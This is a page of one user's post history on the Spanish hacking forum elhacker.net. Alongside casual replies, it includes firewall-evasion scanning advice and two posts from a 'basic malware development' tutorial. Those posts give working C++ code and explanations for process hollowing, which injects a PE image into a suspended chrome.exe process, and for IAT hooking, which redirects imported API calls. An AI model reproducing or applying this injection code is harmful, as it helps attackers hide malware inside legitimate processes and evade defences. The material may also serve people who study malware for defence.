elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 [2] 3 4 5 6 7 8 9 10 11
11  Foros Generales / Foro Libre / Re: Feliz Navidad! en: 25 Diciembre 2023, 19:18 pm
Feliz navidad amiguitos
12  Seguridad Informática / Hacking / Re: Saltarse Firewall en: 25 Diciembre 2023, 17:59 pm
No te des por vencido tan pronto, hay mil y un formas de hacerlo. La maquina de windows es una física o es una vm?
13  Seguridad Informática / Hacking / Re: Saltarse Firewall en: 25 Diciembre 2023, 02:21 am
Hay dos opciones que puedes intentar a primera instancia. Una es el escaneo de pin que se hace con la bandera -Pn, solo que ese requiere root ya que los packetes se escriben directamente. Y la otra es un escaneo por SYN ese por lo general es mas efectivo por que el SYN es parte del handshake de TCP. Trata de evitar los scripts, en especial los que vienen por default en nmap por que la mayoría de los firewall tienen medidas contra estos.
14  Informática / Software / Re: Programa para descargar torrents en: 23 Diciembre 2023, 22:03 pm
El que a mi me gusta es el BitTorrent y mas por que funciona en el navegador t te da mucho control sobre las semillas que estas administrando
15  Foros Generales / Foro Libre / Re: Suika: el juego de colocar fruta de moda en: 23 Diciembre 2023, 22:01 pm
Lo descargue hoy para movil. Es muy adictivo y podria decir que me fue bien en mi primera vez.

16  Seguridad Informática / Seguridad / Re: Malware de smartphone Android conectado por USP-MTP agota y destruye HDDs SATA o USB en: 23 Diciembre 2023, 17:34 pm
Me suena mas bien que va a hacer un problema ya sea de sectores dañados en la participación de tu windows l corrupción del ntfs. Que versión de Windows usas? Qie distribución de Linux? O simplemente que mtp esta obsoleto, es mucho mejor usar adb push en su lugar, especialmente cuando se transfieren varios archivos.

No creo que sea malware. Para empezar el desplegar un malware para android es un proceso muy complejo y no veo que ganarian los desarrolladores con alentarte el envio nomas para fastidiarte. Tal vez en el 2005 si pero ahora el malware es incluso mas simple y nada mas te muestra anuncios o algo asi.
17  Seguridad Informática / Seguridad / Re: su proteccion online ha caducado en: 23 Diciembre 2023, 17:23 pm
Gracias, pero entonces puedo saber que pagina es para eliminarla ?

La mejor solcuion es usar brave que bloquea los anuncios y rastreadores por default. Y cuando algo pida permiso decir que no a menos que su necesidad este claramente definida por el programa.
18  Seguridad Informática / Análisis y Diseño de Malware / Re: Introducción basica al maldev en: 22 Diciembre 2023, 04:44 am
Process Hollowing[/b]

Le digo ahuecamiento de proceso por que no sé cómo traducir "hollowing" en este contexto xd. Pero espero que con la explicación sea mas claro. Esta tecnica comienza con la creacion de un proceso legitimo en estado de suspensión. Este estado nos permite inyectarle codigo para que se ejecute dentro de el. Para que se dé de una manera exitosa, se requiere que la fuente del proceso cumpla con algunos requisitos:

  • Portable Executable: Debe estar en este formato o sea en el formato PE. Este formato incluye un encabezado y secciones que definen las características del ejecutable.
  • Codigo ejecutable: Este ejecutable debe contener código que es ejecutable por el sistema. Este código se encuentra en la sección .text del archivo.
  • Dirección de punto de entrada: El encabezado PE de la fuente debe contener la dirección del punto de entrada del programa. Esta es donde comienza la ejecución. Esta dirección se usa para poner el registro EAX en el contexto de la ejecución de el programa.
  • Secciones y datos: La fuente debe contener secciones de datos como .text para el código entre otras. Estás secciones deben estar bien declaradas en el encabezado y sus datos deben ser accesibles.
  • Tabla de reubicación: Esta no es obligatoria pero si util. Esta le permite la ejecución desde otra dirección base. Si la imagen no la tiene, la unica manera de cargarla seria a través de su dirección preferida.

Ahora un ejemplo de la creación de un proceso en estado suspendido. Cuando se carga, el codigo y datos se reemplazan con el código y datos de otro ejecutable. Lo que crea un proceso suspendido sobre el cual de pueden hacer operaciones con su memoria para cargar una nueva imagen.

Código
  1. // Crear nueva instancia del proceso actual
  2. if (CreateProcessA(path, 0, 0, 0, false, CREATE_SUSPENDED, 0, 0, &SI, &PI))
  3. {
  4.    // Alocar memoria para el contexto
  5.    CTX = LPCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
  6.    CTX->ContextFlags = CONTEXT_FULL; // Context is allocated
  7.  
  8.    // Obtener contexto
  9.    if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) //si el contexto esta en el hilo
  10.    {
  11.        pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(NtHeader->OptionalHeader.ImageBase),
  12.            NtHeader->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
  13.  
  14.        // Topografía de archivo
  15.        WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
  16.        for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)
  17.            WriteProcessMemory
  18.            (
  19.                PI.hProcess,
  20.                LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),
  21.                LPVOID((size_t)Image + SectionHeader[i].PointerToRawData),
  22.                SectionHeader[i].SizeOfRawData,
  23.                0
  24.            );
  25.    }
  26. }
  27.  

La funcion CreateProcessA sirve para crear una nueva instancia de el proceso actual o de algun ejecutable en modo suspendido. Esto se hace con el parámetro CREATE_SUSOENDED lo que significa que su ejecución sera pausada. Despues de su creación se usa VirtualAlloc para alocar memoria para su contexto. La estructura CTX guarda información sobre el estado del proceso.

Obtener y actualizar el contexto

La funcion GetThreadContext obtiene informacion del contexto del hilo principal del proceso suspendido (PI.hThread). Este contexto es el que esta guardado en CTX. El contexto ahora se actualiza en preparación para la ejecución de codigo nuevo. Hablando mas técnicamente el registro EAX se establece para apuntar al codigo nuevo. Despues se copia el encabezado del PE dentro de la memoria a traves de WritePricessMemory. Esto para asegurar que se haya cargado correctamente. Ahora, un ciclo pasa por las secciones de la imagen (adentro del SectionHeader osea el encabezado de la sección.).   Esto copia los datos de la imagen a el espacio designado para el proceso usando WriteProcessMemory.

A este punto el proceso del ahuecado del proceso esta acomodado. Los datos y codigo del  otro PE han sido cargados a la memoria. La ejecución continuara resultando en que el codigo nuevo se ejecute en el contexto del programa inicial.

Código
  1. WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&pImageBase), 4, 0);
  2. CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;
  3. SetThreadContext(PI.hThread, LPCONTEXT(CTX));
  4. ResumeThread(PI.hThread);

La dirección de destino se calcula como CTX->Ebx + 8 y se escriben 4 bytes. Esta operacion establece el punto donde comienza la ejecución del nuevo código. El registro CTX->Eax es actualizado con el nuevo punto de entrada del codigo nuevo. En resumen lo que hace es establecer EIR (el registro de instruccion) a el punto donde esta el codigo que queremos cargar. El punto de entrada se obtiene del encabezado de la imagen. Y ahora que estamos listos invocamos ResumeThread para continuar la ejecución del proceso suspendido.

Es aqui donde el proceso empieza a ejecutar el codigo cargado empezando por el punto de entrada. El codigo que se inyectó en el proceso suspendido ahora tiene el control de la ejecucion del proceso.

Código
  1. char CurrentFilePath[MAX_PATH + 1];
  2. GetModuleFileNameA(0, CurrentFilePath, MAX_PATH);
  3. if (strstr(CurrentFilePath, "chrome.exe")) {
  4. MessageBoxA(0, "holi", "", 0);
  5. return 0;
  6.  
  7. LONGLONG len = -1;
  8. RunPortableExecutable("chrome.exe", MapFileToMemory(CurrentFilePath, len));
  9. return 0;
  10. }
  11.  

Cuando este código es ejecutado, se obtiene el directorio del ejecutable como en si. Hay una revisión conditional para checkar CurrentFilePath usando strstr. Si este directorio contiene "chrome.exe" muestra el mensaje "holi" usando MessageBoxA. O la ejecucion continua si el directorio no cumple con la condicion. Se ejecuta RunPortableExecutable. Nuestro objectivo de ahuecado seria "chrome.exe", le pasa el codigo al proceso hueco y si no busca otra imagen.
19  Seguridad Informática / Análisis y Diseño de Malware / Re: Introducción basica al maldev en: 21 Diciembre 2023, 21:51 pm
Enganchado IAT

El cargado dinamico de funciones es una tecnica que se usa en el ámbito del desarrollo de software para windows y a menudo se usa en el maldev. Una manera de lograr esto es usando IAT hooking (enganchado de Import Address Table [tabla de direcciones de importación]). La IAT contiene las direcciones de las funciones que importa un programa de algun módulo. Esta tecnica que veremos nos ayuda a interceptar y modificar invocación de funcion dentro de la ejecución de un programa.



Esta imagen nos muestra la estructura de una IAT y como interactuaria un enganche con ella. Primero el programa en cuestión llama la función MessageBoxA de el WinAPI. El programa busca la dirección de esta función y luego brinca la ejecución a ella. Aqui es donde esta el código legitimo de MessageBoxA. Asi funciona la IAT en el contexto de abrir MessageBoxA:

Código
  1. #define getNtHdr(buf) ((IMAGE_NT_HEADERS *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew))
  2. #define getSectionArr(buf) ((IMAGE_SECTION_HEADER *)((size_t)buf + ((IMAGE_DOS_HEADER *)buf)->e_lfanew + sizeof(IMAGE_NT_HEADERS))

Esta invocación de la función generalmente se hace mediante una función o una librería del API de Windows. Cuando un programa invoca una función, lo haces de esta manera y no accesando el código de la función como tal. Asi busca su dirección en la IAT que contiene las direcciones de todas kas funciones importadas. Una vez encontrada esta dirección la ejecución se va a ella. Yo me lo imagino algo asi como un DNS para funciones. Rn este caso se obtiene una dirección legitima de MessageBoxA.

Código
  1. size_t ptr_msgboxa = 0;
  2. void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr)
  3. {
  4.    auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
  5.    auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];
  6.    for (; impModuleList->Name; impModuleList++)
  7.    {
  8.        auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];
  9.        auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];
  10.        for (int i = 0; arr_apiNames[i].u1.Function; i++)
  11.        {
  12.            auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];
  13.            if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name))
  14.            {
  15.                apiAddr = arr_callVia[i].u1.Function;
  16.                arr_callVia[i].u1.Function = callback;
  17.                break;
  18.            }
  19.        }
  20.    }
  21. }

Entonces aquí sucede algo diferente. En vez de ejecutar la función MessageBoxA, la entrada en la IAT es modificada para que apunte a otra función. Asi que cuando se ejecuta MessageBoxA en el programa, en realidad se esta ejecutando la función que ka reemplaza. Esto nos permite alterar el funcionamiento esperado del programa.
20  Seguridad Informática / Análisis y Diseño de Malware / Re: Introducción basica al maldev en: 21 Diciembre 2023, 21:50 pm
Me gusta el tema,  seguiré tu post.

Gracias por el aporte.

Gracias, hago muchas cosas a la vez pero intentaré compartir lo mas que pueda.
Páginas: 1 [2] 3 4 5 6 7 8 9 10 11
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines